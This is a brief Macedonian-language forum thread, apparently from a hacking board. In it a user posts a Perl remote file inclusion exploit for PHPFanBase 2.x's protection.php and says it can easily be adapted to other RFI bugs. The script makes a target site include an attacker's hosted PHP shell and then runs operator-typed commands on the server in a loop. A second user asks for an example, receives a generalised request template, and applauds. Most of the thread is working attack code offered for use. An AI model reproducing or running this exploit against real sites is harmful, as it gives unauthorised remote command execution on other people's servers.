[PERL] PHPFanBase 2.x (protection.php) RFI exploit

[S]

Ednostavna skripta za stariot PHPFanBase RFI bug koja lesno mozhe da se modificira i upotrebi za bilo koj drug RFI bug ...

[hl='perl']
#!/usr/bin/perl
#


use LWP::UserAgent;

while (@ARGV < 2) {
print "Usage: $0 <Vulnerable Site> <Your Evil phpshell>\n";
exit();
}

$vulnsite = $ARGV[0];
$phpshell = $ARGV[1];

while (1) {
print "Command to execute: ";
chomp($command = <STDIN>);
$age = LWP::UserAgent->new() || die;

$results = $age->request(HTTP::Request->new(GET=>$vulnsite.'/members/protection.php?action=logout&siteurl='.$phpshell.'?&cmd='.$command) || die);
$content = $results->content;

print $content;
}

# it.com.mk
[/hl]

 

[LiquidWorm]

како на пример кој ?

 

[S]

како на пример кој ?

kako na primer bilo koj :-DD

hint:

HTTP::Request->new(GET=>.'/members/protection.php?action=logout&siteurl='..'?&cmd='.) || die);

 

[LiquidWorm]

:bravo: